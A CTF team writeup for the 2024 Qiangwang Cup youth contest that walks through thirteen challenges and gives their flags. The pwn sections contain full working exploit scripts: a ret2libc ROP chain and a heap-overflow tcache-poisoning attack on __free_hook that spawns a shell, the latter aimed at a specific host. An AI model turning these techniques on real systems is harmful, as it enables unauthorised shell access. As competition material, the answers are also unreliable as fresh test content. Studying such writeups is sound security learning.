SfTian

2024 Qiangwang Cup Youth Special Competition Online Writeup

## 1. Team Information

Team name: 半亩塘的一只鹅

Team rank: 7

## 2. Challenges Solved

![img](https://download.imxbt.cn/upload/clip_image002.jpg)

## 3. Solutions

### 1 Classics

#### Steps:

The attachment is a ciphertext produced by several layers of encoding in CyberChef; applying the inverse operations in reverse order recovers the flag.

![img](https://download.imxbt.cn/upload/clip_image004.jpg)

#### Flag:

flag{2834d185-a1da-4fb1-8bac-59076eb6a634}

### 2 签到漫画 (Sign-in Comic)

#### Steps:

Start the container and read the comics; each comic ends with one piece of a QR code.

![img](https://download.imxbt.cn/upload/clip_image006.jpg)

Stitching the pieces together with an online tool gives the flag.

![image-20241125215114284](https://download.imxbt.cn/upload/202411252151362.png)

#### Flag:

flag{youthful_and_upward}

### 3 ezGetFlag

#### Steps:

Open the container's web page and keep clicking as prompted by the "You have x more …" message below; a hint then appears.

![img](https://download.imxbt.cn/upload/clip_image010.jpg)

![img](https://download.imxbt.cn/upload/clip_image012.jpg)

Changing the method of the button's form from GET to POST is all that is needed.

![img](https://download.imxbt.cn/upload/clip_image014.jpg)

#### Flag:

flag{75e71ee8-fa7d-4527-bffb-1f8554611db2}

### 4 clock_in

#### Steps:

This challenge is ret2libc: first overflow the buffer, then obtain the libc base address and build the ROP chain, and finally compute the address of /bin/sh and execute.

![image-20241125215143249](https://download.imxbt.cn/upload/202411252151332.png)

#### If you used your own script for this challenge, give it in full; screenshots are not allowed

```python
from pwn import *

context(log_level='debug', arch='amd64')

p = remote('ip', port)  # 'ip' and port are placeholders for the challenge instance
elf = ELF('./clock_in')
libc = ELF('libc.so.6')


def get_libc_base():
    # Reads the address leaked by puts (6 bytes ending in 0x7f)
    return u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00'))


def s(a):
    p.send(a)


def sa(a, b):
    p.sendafter(a, b)


def sl(a):
    p.sendline(a)


def sla(a, b):
    p.sendlineafter(a, b)


def inter():
    p.interactive()


def exp():
    rdi = 0x000000004011c5  # pop rdi; ret gadget

    # Stage 1: print puts@got, then return into the program for a second input
    payload1 = b'a' * 0x48
    payload1 += p64(rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x401253)
    sl(payload1)

    libc_base = get_libc_base() - libc.sym['puts']
    libc.address = libc_base
    system = libc.sym['system']
    bin_sh = next(libc.search(b'/bin/sh\x00'))

    # Stage 2: system("/bin/sh"); rdi + 1 is the bare ret, used for stack alignment
    payload2 = b'a' * 0x48
    payload2 += p64(rdi) + p64(bin_sh) + p64(rdi + 1) + p64(system)
    sl(payload2)
    inter()


exp()
```

#### Flag:

flag{bb92f04b-7317-4202-bc48-cdc9f1df428e}

### 5 ezmath

#### Steps:

This one was obtained by grilling GPT o1; the script is below.

![image-20241125215203897](https://download.imxbt.cn/upload/202411252152962.png)

![img](https://download.imxbt.cn/upload/clip_image020.jpg)

```python
from Crypto.Util.number import inverse, long_to_bytes
from gmpy2 import next_prime
import sys

n = 739243847275389709472067387827484120222494013590074140985399787562594529286597003777105115865446795908819036678700460141950875653695331369163361757157565377531721748744087900881582744902312177979298217791686598853486325684322963787498115587802274229739619528838187967527241366076438154697056550549800691528794136318856475884632511630403822825738299776018390079577728412776535367041632122565639036104271672497418509514781304810585503673226324238396489752427801699815592314894581630994590796084123504542794857800330419850716997654738103615725794629029775421170515512063019994761051891597378859698320651083189969905297963140966329378723373071590797203169830069428503544761584694131795243115146000564792100471259594488081571644541077283644666700962953460073953965250264401973080467760912924607461783312953419038084626809675807995463244073984979942740289741147504741715039830341488696960977502423702097709564068478477284161645957293908613935974036643029971491102157321238525596348807395784120585247899369773609341654908807803007460425271832839341595078200327677265778582728994058920387721181708105894076110057858324994417035004076234418186156340413169154344814582980205732305163274822509982340820301144418789572738830713925750250925049059
c = 229043746793674889024653533006701296308351926745769842802636384094759379740300534278302123222014817911580006421847607123049816103885365851535481716236688330600113899345346872012870482410945158758991441294885546642304012025685141746649427132063040233448959783730507539964445711789203948478927754968414484217451929590364252823034436736148936707526491427134910817676292865910899256335978084133885301776638189969716684447886272526371596438362601308765248327164568010211340540749408337495125393161427493827866434814073414211359223724290251545324578501542643767456072748245099538268121741616645942503700796441269556575769250208333551820150640236503765376932896479238435739865805059908532831741588166990610406781319538995712584992928490839557809170189205452152534029118700150959965267557712569942462430810977059565077290952031751528357957124339169562549386600024298334407498257172578971559253328179357443841427429904013090062097483222125930742322794450873759719977981171221926439985786944884991660612824458339473263174969955453188212116242701330480313264281033623774772556593174438510101491596667187356827935296256470338269472769781778576964130967761897357847487612475534606977433259616857569013270917400687539344772924214733633652812119743
e = 65537  # Public exponent
l = 2331

# Define states
states = list(range(7))  # 0 to 6


# Initialize transition table
def get_next_state(s, b):
    if s == 1 or s == 2 or s == 3:
        # consecutive ones
        co = s
        if b == 1:
            co += 1
            if co == 4:
                return -1  # invalid
            else:
                return co
        else:
            return 4  # start consecutive zeros
    elif s == 4 or s == 5 or s == 6:
        # consecutive zeros
        cz = s - 3
        if b == 0:
            cz += 1
            if cz == 4:
                return -1  # invalid
            else:
                return cz + 3
        else:
            return 1  # start consecutive ones
    elif s == 0:
        # neutral state
        if b == 1:
            return 1
        else:
            return 4


transition = {}
for s in states:
    transition[s] = {}
    for b in [0, 1]:
        next_state = get_next_state(s, b)
        transition[s][b] = next_state

# Initialize DP array
DP = [[0] * 7 for _ in range(2)]
DP[0][1] = 1  # Start with one '1'
mod = None  # Can be used if you want to compute modulo some number

# Perform DP
for pos in range(1, l - 1):
    curr = pos % 2
    prev = (pos - 1) % 2
    DP[curr] = [0] * 7
    for s in states:
        count = DP[prev][s]
        if count == 0:
            continue
        for b in [0, 1]:
            next_s = transition[s][b]
            if next_s != -1:
                DP[curr][next_s] += count
                if mod:
                    DP[curr][next_s] %= mod

# Handle the last bit which is fixed as '1'
total = 0
curr = (l - 2) % 2
for s in states:
    count = DP[curr][s]
    if count == 0:
        continue
    b = 1  # Last bit is '1'
    next_s = transition[s][b]
    if next_s != -1:
        total += count
        if mod:
            total %= mod

key = total
print(f"Computed key: {key}")

# Now compute p and factor n
p = int(next_prime(key))
q = n // p

# Verify that n is indeed p * q
assert p * q == n, "Failed to factor n correctly!"

# Compute phi(n)
phi = (p - 1) * (q - 1)

# Compute the private exponent d
d = inverse(e, phi)

# Decrypt the message
m = pow(c, d, n)
flag = long_to_bytes(m)
print(f"Decrypted flag: {flag.decode()}")
```

#### Flag:

flag{77310934-21fa-4ee4-a783-dc1865ebab28}

### 6 AliceAES

#### Steps:

The challenge provides the key and IV and asks for "Hello Bob!" to be encrypted in CBC mode, so doing it in CyberChef is enough.

![image-20241125215231495](https://download.imxbt.cn/upload/202411252152563.png)

#### Flag:

flag{add7fd70-c006-43b9-92b3-5a212b137108}

### 7 ezFindShell

#### Steps:

After downloading www.zip, grep for POST on Linux to find the webshell.

![img](https://download.imxbt.cn/upload/clip_image026.jpg)

Analysing the one-line webshell: e is passed via GET and also needs base64 decoding, while POST is sent straight through as the POST parameter.

![img](https://download.imxbt.cn/upload/clip_image028.jpg)

![img](https://download.imxbt.cn/upload/clip_image030.jpg)

#### Flag:

flag{e1a47208-a4f9-4e06-895d-0e46e54f6b7f}

### 8 whitepic

#### Steps:

The hex view shows the file is a GIF; opening it in StegSolve's frame browser reveals the flag.

![image-20241125215307625](https://download.imxbt.cn/upload/202411252153712.png)

#### Flag:

flag{passion_is_the_greatest_teacher}

### 9 EnterGame

#### Steps:

IDA analysis shows ChaCha20 encryption; the ciphertext and the key need to be recovered.

![image-20241125215318793](https://download.imxbt.cn/upload/202411252153861.png)

The key is:

```
0x38, 0x7f, 0xcb, 0xb4, 0xfc, 0x46, 0x13, 0x4f, 0x22, 0x27, 0x31, 0xc2, 0x2d, 0x53, 0x25, 0xb4, 0x58, 0x6f, 0x75, 0x74, 0x67, 0x20, 0x53, 0x74, 0x71, 0x65, 0x6e, 0x67, 0x73, 0x68, 0x65, 0x6e, 0x9a, 0xe4, 0x9e, 0xb8, 0x86, 0xcf, 0x69, 0x3f, 0xaa, 0xbc, 0x94, 0x90, 0x84, 0xdd, 0xfe, 0xff
```

The ciphertext is:

```
0x5e, 0x13, 0xaa, 0xd3, 0x87, 0x75, 0x2b, 0x7a, 0x1b, 0x16, 0x4, 0xa3, 0x49, 0x7e, 0x1d, 0xd2, 0x6b, 0x5d, 0x58, 0x40, 0x5e, 0x44, 0x63, 0x59, 0x48, 0x51, 0xd, 0x54, 0x5e, 0x58, 0x55, 0x58, 0xad, 0x82, 0xaf, 0xdc, 0xe7, 0xab, 0x58, 0x5d, 0xce, 0xc1, 0x8f, 0xa, 0x11, 0x7f
```

![image-20241125215347895](https://download.imxbt.cn/upload/202411252153971.png)

```python
key = [0x38, 0x7f, 0xcb, 0xb4, 0xfc, 0x46, 0x13, 0x4f, 0x22, 0x27, 0x31, 0xc2, 0x2d, 0x53, 0x25, 0xb4, 0x58, 0x6f, 0x75, 0x74, 0x67, 0x20, 0x53, 0x74, 0x71, 0x65, 0x6e, 0x67, 0x73, 0x68, 0x65, 0x6e, 0x9a, 0xe4, 0x9e, 0xb8, 0x86, 0xcf, 0x69, 0x3f, 0xaa, 0xbc, 0x94, 0x90, 0x84, 0xdd, 0xfe, 0xff]
enc = [0x5e, 0x13, 0xaa, 0xd3, 0x87, 0x75, 0x2b, 0x7a, 0x1b, 0x16, 0x4, 0xa3, 0x49, 0x7e, 0x1d, 0xd2, 0x6b, 0x5d, 0x58, 0x40, 0x5e, 0x44, 0x63, 0x59, 0x48, 0x51, 0xd, 0x54, 0x5e, 0x58, 0x55, 0x58, 0xad, 0x82, 0xaf, 0xdc, 0xe7, 0xab, 0x58, 0x5d, 0xce, 0xc1, 0x8f, 0xa, 0x11, 0x7f]

# XOR each ciphertext byte with the key byte at the same position
for i in range(len(enc)):
    print(chr(enc[i] ^ key[i]), end='')
```

#### Flag:

flag{385915ad-8f32-49d0-94c3-0067f1dad1bd}

### 10 问卷 (Questionnaire)

#### Steps:

Fill in the questionnaire to get the flag.

![img](https://download.imxbt.cn/upload/clip_image040.jpg)

#### Flag:

flag{thank_you_for_your_support}

### 11 删除后门用户2 (Delete Backdoor User 2)

#### Steps:

After logging in over SSH, ps -a shows a process named b running; its purpose is unclear, so just kill it.

![image-20241125215425844](https://download.imxbt.cn/upload/202411252154905.png)

Checking passwd reveals a backdoor user; userdel -f backdoor takes care of it.

#### Flag:

flag{51efce2c-9d54-4bac-bb7b-5ceecfaea2a0}

### 12 Flip_over

#### Steps:

Because the source code is obfuscated, take libnative-lib.so straight from the lib folder and load it into IDA. A string search turns up a plaintext flag{ in validateAndEncrypt, along with a plaintext string used in a memcpy.

![img](https://download.imxbt.cn/upload/clip_image046.jpg)

![img](https://download.imxbt.cn/upload/clip_image048.jpg)

The two sub functions are RC4 and DES encryption, which produce the key; after that comes the XOR with 0x21 in the while loop. Following the RC4 and DES encryption first gives the key:

```
5915c13f409a7ae7a68bb6e3ee0d196db76dcae6da5f0d4bd60ab2deadaa95eb85b777c310bbcfcef7d222c9c4f9fcfbab32ea318155af79528e80afc3186050f1d840bbfc1b89a6
```

The ciphertext is in plain sight: it is the part above that starts with 0x1E 0x58. Feed it into CyberChef.

![img](https://download.imxbt.cn/upload/clip_image050.jpg)

#### Flag:

flag{b92d40df-840a-43a8-bdb4-5de79eca13f4}

### 13 journey_story

#### Steps:

All protections are enabled!

![img](https://download.imxbt.cn/upload/clip_image052.jpg)

Loading the binary into IDA shows several sub-functions; the bug is a heap overflow. Overwriting a chunk's size creates overlapping chunks, libc is leaked through the unsorted bin, then tcache poisoning targets the free hook, and writing the /bin/sh address gets a shell.

![image-20241125215611632](https://download.imxbt.cn/upload/202411252156769.png)

```python
from pwn import *
from pwncli import *
from ctypes import *

context(os='linux', arch='amd64', log_level='debug')

libc = ELF('libc-2.31.so')
elf = ELF('./journey_story')
p = remote("39.106.48.123", 19369)


def add(size, content):
    p.sendlineafter(b"option: ", b"1")
    p.sendlineafter(b"0xb0): ", str(hex(size)).encode())
    p.sendlineafter(b"racters): ", content)


def free(idx):
    p.sendlineafter(b"option: ", b"2")
    p.sendlineafter(b": ", str(idx).encode())


def show(idx):
    p.sendlineafter(b"option: ", b"4")
    p.sendlineafter(b": ", str(idx).encode())


def edit(idx, content):
    p.sendlineafter(b"option: ", b"3")
    p.sendlineafter(b": ", str(idx).encode())
    p.sendline(content)


# Fill and then free seven 0xb0 chunks
for i in range(7):
    add(0xb0, b'aaaa')
for i in range(7):
    free(i)

for i in range(6):
    add(0x28, b'aaaa')

# Overflow from chunk 0 into the size field of the next chunk
edit(0, b'b' * 0x28 + b'\xc1')
free(1)
add(0x28, b'\x00')

# Leak libc through the unsorted bin
show(2)
libc_base = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
p.sendline(b"10")

for i in range(3):
    add(0x28, b'cccc')
free(2)
free(3)
show(7)
p.recvuntil(b"Story 7 (size 0x28): ")
heap_base = u64(p.recv(8)) & 0xfffffffff000

# Tcache poisoning towards __free_hook
edit(7, p64(free_hook) + b'\x0a')
add(0x28, b'/bin/sh\x00')
add(0x28, p64(libc_base + libc.sym["system"]))
free(2)
p.interactive()
```

#### Flag:

flag{9d64fa26-eac0-4f23-9eae-b19fbe0ee18d}
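
A cross-check for the counting step of the ezmath script (section 5), added here as an example and not part of the original writeup: it recounts the bit strings that start and end with 1 and never repeat a bit more than three times in a row, once with a compact state machine and once by exhaustive enumeration, so the automaton can be validated on small lengths before trusting it for l = 2331. The function names and MAX_RUN are assumptions of this example.

```python
from itertools import product

MAX_RUN = 3  # assumption read off the script: a 4th equal bit in a row is invalid


def count_dp(length, max_run=MAX_RUN):
    """Count bit strings of `length` bits that start and end with '1' and
    never repeat a bit more than `max_run` times in a row."""
    if length == 1:
        return 1
    states = {(1, 1): 1}  # (last bit, current run length) -> number of prefixes
    for pos in range(1, length):
        choices = (1,) if pos == length - 1 else (0, 1)  # last bit is fixed to 1
        nxt = {}
        for (bit, run), ways in states.items():
            for b in choices:
                new_run = run + 1 if b == bit else 1
                if new_run <= max_run:
                    nxt[(b, new_run)] = nxt.get((b, new_run), 0) + ways
        states = nxt
    return sum(states.values())


def count_bruteforce(length, max_run=MAX_RUN):
    """Same count by enumerating every candidate string (small lengths only)."""
    if length == 1:
        return 1
    banned = ("0" * (max_run + 1), "1" * (max_run + 1))
    total = 0
    for middle in product("01", repeat=length - 2):
        s = "1" + "".join(middle) + "1"
        if not any(run in s for run in banned):
            total += 1
    return total


def first_mismatch(limit=16):
    """Return the first length where the two counts differ, or None."""
    for length in range(1, limit + 1):
        if count_dp(length) != count_bruteforce(length):
            return length
    return None


if __name__ == "__main__":
    print("first mismatch:", first_mismatch())
    print("bit length of the count for l=2331:", count_dp(2331).bit_length())
```
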